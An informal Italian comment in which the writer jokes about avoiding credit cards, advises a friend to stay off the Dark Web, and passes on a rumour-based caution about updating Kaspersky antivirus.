Mo capisci perchè non uso carte credito (come sopraddetto, faccio pagare a Lella) quindi non entrare nel Dark Web (ti fregano anche nel normale) e limitati a navigare nel 10% dei siti sopra il pelo dell'acqua senza scoprire cosa di offre il Deep Dark Web....e adesso vado a buttare l'immondizia.. ahhh dimenticavo di dirti di fare attenzione se usi l'antivirus russo Kaspersky..senza allarmismo ma fai solo attenzione quando l'aggiorni..girano voci strane nel Dark per cui il nostro Governo ha già comunicato alle PA di provvedere alle sostituzioni antivirus.